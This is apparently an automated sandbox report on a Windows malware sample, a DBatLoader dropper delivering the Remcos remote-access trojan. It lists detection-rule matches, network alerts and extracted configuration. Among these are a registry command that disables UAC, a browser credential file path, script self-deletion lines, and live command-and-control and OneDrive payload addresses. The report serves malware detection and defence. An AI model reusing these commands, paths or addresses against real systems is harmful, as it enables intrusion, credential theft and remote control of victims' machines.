20.2.flhgywjG.bat.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x644e4:$str_a1: C:\Windows\System32\cmd.exe 0x64460:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64460:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64960:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65190:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64554:$str_b2: Executing file: 0x655d4:$str_b3: GetDirectListeningPort 0x64f80:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65100:$str_b7: \update.vbs 0x6457c:$str_b9: Downloaded file: 0x64568:$str_b10: Downloading file: 0x6460c:$str_b12: Failed to upload file: 0x6559c:$str_b13: StartForward 0x655bc:$str_b14: StopForward 0x65058:$str_b15: fso.DeleteFile " 0x64fec:$str_b16: On Error Resume Next 0x65088:$str_b17: fso.DeleteFolder " 0x645fc:$str_b18: Uploaded file: 0x645bc:$str_b19: Unable to delete: 0x65020:$str_b20: while fso.FileExists(" 0x64a99:$str_c0: [Firefox StoredLogins not found]
0.0.tTIYCp2sf4.exe.400000.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
17.2.flhgywjG.bat.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.flhgywjG.bat.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.2.flhgywjG.bat.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x653d8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6536c:$s1: CoGetObject 0x65380:$s1: CoGetObject 0x6539c:$s1: CoGetObject 0x6f27e:$s1: CoGetObject 0x6532c:$s2: Elevation:Administrator!new:
17.2.flhgywjG.bat.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b490:$a1: Remcos restarted by watchdog! 0x6ba0c:$a3: %02i:%02i:%02i:%03i
17.2.flhgywjG.bat.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x654e4:$str_a1: C:\Windows\System32\cmd.exe 0x65460:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65460:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65960:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66190:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65554:$str_b2: Executing file: 0x665d4:$str_b3: GetDirectListeningPort 0x65f80:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66100:$str_b7: \update.vbs 0x6557c:$str_b9: Downloaded file: 0x65568:$str_b10: Downloading file: 0x6560c:$str_b12: Failed to upload file: 0x6659c:$str_b13: StartForward 0x665bc:$str_b14: StopForward 0x66058:$str_b15: fso.DeleteFile " 0x65fec:$str_b16: On Error Resume Next 0x66088:$str_b17: fso.DeleteFolder " 0x655fc:$str_b18: Uploaded file: 0x655bc:$str_b19: Unable to delete: 0x66020:$str_b20: while fso.FileExists(" 0x65a99:$str_c0: [Firefox StoredLogins not found]
Click to see the 26 entries

Sigma Signatures

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 3C 5E F5 F5 68 1B 7F D9 B5 21 6B E2 7D 73 DB F1 B7 1B 1F E7 7A C7 EF B7 CA 30 AD 6F 25 50 55 23 31 01 4C 97 89 6E D6 92 D6 39 C4 DF 31 EB A5 6C 58 ED 7A 9E 48 A5 7A 3D 9B 3D EB A0 64 64 D7 30 2B DD E6 8F F4 FE 29 C0 95 CF 7E 09 24 50 , EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\flhgywjG.bat, ProcessId: 4028, TargetObject: HKEY_CURRENT_USER\Software\Rmc-5D7S76\exepath

Snort Signatures

ET TROJAN Remcos 3.x Unencrypted Server Response - Source IP: 23.172.112.72 - Destination IP: 192.168.2.4

Timestamp:	23.172.112.72192.168.2.42404496822032777 08/04/23-18:16:13.628852
SID:	2032777
Source Port:	2404
Destination Port:	49682
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Remcos 3.x Unencrypted Checkin - Source IP: 192.168.2.4 - Destination IP: 23.172.112.72

Timestamp:	192.168.2.423.172.112.724968224042032776 08/04/23-18:14:07.921866
SID:	2032776
Source Port:	49682
Destination Port:	2404
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Windows \System32\netutils.dll	Avira: detection malicious, Label: TR/Starter.glbyt
Source: C:\Users\Public\Libraries\netutils.dll	Avira: detection malicious, Label: TR/Starter.glbyt

Found malware configuration

Source: tTIYCp2sf4.exe	Malware Configuration Extractor: DBatLoader {"Download Url": "https://onedrive.live.com/download?resid=F253EE082321791B%21110&authkey=!AMAFiW2uLt6IzGM"}
Source: 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": "www.binccoco.com:2404:0", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Mutex": "Rmc-5D7S76", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "gfdghfhjf"}

Multi AV Scanner detection for submitted file

Source: tTIYCp2sf4.exe	Virustotal: Detection: 47%			Perma Link
Source: tTIYCp2sf4.exe	ReversingLabs: Detection: 55%

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.586128217.0000000000647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.571086194.0000000000557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tTIYCp2sf4.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: flhgywjG.bat PID: 4028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: flhgywjG.bat PID: 6572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: flhgywjG.bat PID: 6888, type: MEMORYSTR

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	ReversingLabs: Detection: 55%
Source: C:\Users\Public\Libraries\netutils.dll	ReversingLabs: Detection: 83%
Source: C:\Windows \System32\netutils.dll	ReversingLabs: Detection: 83%

Machine Learning detection for sample

Source: tTIYCp2sf4.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Gjwyghlf.PIF

Joe Sandbox ML: detected

Source: tTIYCp2sf4.exe, 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tTIYCp2sf4.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: flhgywjG.bat PID: 4028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: flhgywjG.bat PID: 6572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: flhgywjG.bat PID: 6888, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\flhgywjG.bat	Unpacked PE file: 17.2.flhgywjG.bat.400000.0.unpack
Source: C:\Users\Public\Libraries\flhgywjG.bat	Unpacked PE file: 20.2.flhgywjG.bat.400000.0.unpack
Source: C:\Users\Public\Libraries\flhgywjG.bat	Unpacked PE file: 22.2.flhgywjG.bat.400000.0.unpack

Source: tTIYCp2sf4.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source:	Binary string: easinvoker.pdb source: tTIYCp2sf4.exe, 00000000.00000002.558279383.000000007F300000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000003.537518251.000000007EE70000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554984890.00000000028C4000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.542660336.000000000060C000.00000004.00000020.00020000.00000000.sdmp, easinvoker.exe, easinvoker.exe, 0000000B.00000002.546849860.00007FF780541000.00000020.00000001.01000000.00000006.sdmp, easinvoker.exe.5.dr, easinvoker.exe.0.dr
Source:	Binary string: easinvoker.pdbH source: tTIYCp2sf4.exe, 00000000.00000002.558279383.000000007F300000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000003.540595825.0000000003971000.00000004.00000020.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000003.537518251.000000007EE70000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554984890.00000000028C4000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.542660336.000000000060C000.00000004.00000020.00020000.00000000.sdmp, easinvoker.exe, 0000000B.00000002.546849860.00007FF780541000.00000020.00000001.01000000.00000006.sdmp, easinvoker.exe.5.dr, easinvoker.exe.0.dr

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

Code function: 0_2_028558CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_028558CC

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49682 -> 23.172.112.72:2404
Source: Traffic	Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 23.172.112.72:2404 -> 192.168.2.4:49682

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: www.binccoco.com
Source: Malware configuration extractor	URLs: https://onedrive.live.com/download?resid=F253EE082321791B%21110&authkey=!AMAFiW2uLt6IzGM

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 178.237.33.50 178.237.33.50

Source: global traffic

TCP traffic: 192.168.2.4:49682 -> 23.172.112.72:2404

Source: tTIYCp2sf4.exe, 00000000.00000003.552419169.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.559418518.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.557234330.00000000040BA000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554984890.00000000028C4000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.556810899.0000000003DD0000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000013.00000002.571706937.0000000002482000.00000004.00001000.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000015.00000002.586811014.00000000028E2000.00000004.00001000.00020000.00000000.sdmp, flhgywjG.bat.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: tTIYCp2sf4.exe, 00000000.00000002.553677436.0000000000706000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000013.00000002.571116857.000000000075F000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000015.00000002.586140973.0000000000854000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: flhgywjG.bat, 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: tTIYCp2sf4.exe, 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, flhgywjG.bat, 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, flhgywjG.bat, 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: flhgywjG.bat, 00000011.00000003.555823587.0000000000718000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053931437.0000000000718000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpA
Source: flhgywjG.bat, 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpUse
Source: flhgywjG.bat, 00000011.00000003.555823587.0000000000718000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053931437.0000000000718000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpV
Source: flhgywjG.bat, 00000011.00000003.555823587.0000000000718000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053931437.0000000000718000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpu
Source: flhgywjG.bat, 00000011.00000003.555823587.0000000000740000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000003.555974241.0000000000740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpv
Source: tTIYCp2sf4.exe, 00000000.00000003.552419169.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.559418518.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.557234330.00000000040BA000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554984890.00000000028C4000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.556810899.0000000003DD0000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000013.00000002.571706937.0000000002482000.00000004.00001000.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000015.00000002.586811014.00000000028E2000.00000004.00001000.00020000.00000000.sdmp, flhgywjG.bat.0.dr	String found in binary or memory: http://ocsp.comodoca.com0$
Source: tTIYCp2sf4.exe, 00000000.00000003.552419169.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.559418518.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.557234330.00000000040BA000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554984890.00000000028C4000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.556810899.0000000003DD0000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000013.00000002.571706937.0000000002482000.00000004.00001000.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000015.00000002.586811014.00000000028E2000.00000004.00001000.00020000.00000000.sdmp, flhgywjG.bat.0.dr	String found in binary or memory: http://www.pmail.com0
Source: Gjwyghlf.PIF, 00000013.00000002.571116857.000000000075F000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000015.00000002.586140973.0000000000854000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ayhtnw.dm.files.1drv.com/
Source: tTIYCp2sf4.exe, 00000000.00000002.553677436.0000000000706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ayhtnw.dm.files.1drv.com/J
Source: Gjwyghlf.PIF, 00000015.00000002.586140973.00000000008B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ayhtnw.dm.files.1drv.com/y4m4VylKmgdBdvvrh54vLZrWMuDABvydj_FzcB4yTAcMw3yYdRWA5xBM_Xw71itRSxy
Source: Gjwyghlf.PIF, 00000015.00000002.586140973.0000000000854000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ayhtnw.dm.files.1drv.com/y4m6iXArnexJA3XWMqmxDU_FDhcxoLEipAhkbbHXed1HP3M9deRhNw71hrpiz4ckK7t
Source: tTIYCp2sf4.exe, 00000000.00000002.553677436.0000000000706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ayhtnw.dm.files.1drv.com/y4mID53eHUXwMfKPiOplADIMqhKYXyanRMavG2yv4vnsgvX8cFZFM3kseRp0HiRXi0G
Source: Gjwyghlf.PIF, 00000013.00000002.571116857.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ayhtnw.dm.files.1drv.com/y4mLRWb5d-9lXG25WT_7eBiLWY8sZ0Eciy
Source: Gjwyghlf.PIF, 00000013.00000002.571116857.000000000075F000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000013.00000002.571116857.0000000000738000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ayhtnw.dm.files.1drv.com/y4mLRWb5d-9lXG25WT_7eBiLWY8sZ0EciysmR5ps_k7tv4ZzBCmLo9oDZ-Vt6f5KVvj
Source: Gjwyghlf.PIF, 00000013.00000002.571116857.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ayhtnw.dm.files.1drv.com:443/y4mLRWb5d-9lXG25WT_7eBiLWY8sZ0EciysmR5ps_k7tv4ZzBCmLo9oDZ-Vt6f5
Source: tTIYCp2sf4.exe, 00000000.00000002.553677436.0000000000706000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000013.00000002.571116857.000000000075F000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/
Source: Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/S
Source: Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/W
Source: Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=F253EE082321791B%21110&authkey=
Source: tTIYCp2sf4.exe, 00000000.00000002.553677436.000000000067A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onhtnw.dm.files.1drv.com/

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\Public\Libraries\flhgywjG.bat

Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\flhgywjG.bat

Jump to behavior

Source: Yara match

File source: Process Memory Space: tTIYCp2sf4.exe PID: 7068, type: MEMORYSTR

Source: tTIYCp2sf4.exe, 00000000.00000002.553677436.000000000067A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.586128217.0000000000647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.571086194.0000000000557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tTIYCp2sf4.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: flhgywjG.bat PID: 4028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: flhgywjG.bat PID: 6572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: flhgywjG.bat PID: 6888, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
